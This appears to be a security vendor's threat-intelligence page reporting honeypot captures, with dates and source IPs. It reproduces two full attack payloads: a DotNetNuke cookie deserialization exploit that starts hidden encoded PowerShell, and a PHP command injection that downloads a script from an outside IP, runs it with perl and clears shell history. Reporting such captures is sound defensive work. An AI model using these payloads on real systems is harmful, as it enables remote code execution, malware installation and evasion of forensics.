Advanced Threat Detection in Phishing Email Attachments
Advanced Threat Detection in Phishing Email Attachments by CloudCoffer
Advanced Threat Detection in Phishing Email Attachments by CloudCoffer
Date of Detection: 2017.12.11 Source IP Addresses: 173.212.217.181、149.255.35.91 Attack Raw Pattern: DNNPersonalization=<profile><item key=\”key\” type=\”System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\”><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\”ObjectStateFormatter\” xmlns:p3=\”http://www.w3.org/2001/XMLSchema-instance\” /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\”http://www.w3.org/2001/XMLSchema\” p5:type=\”q1:string\” xmlns:p5=\”http://www.w3.org/2001/XMLSchema-instance\”>/wEy8ykAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>; Target System: Windows with .NET Framework Malicious File Path from the Read more about Honeypot Extraction -Windows .NET Framework[…]
Date of Detection: 2017.11.20 Source IP Addresses: 27.255.77.103 Attack Raw Pattern: After decoding URL, the pattern is as follows. <? system(“cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c “); ?> Malicious File Path from the Read more about Honeypot Extraction -Command Injection[…]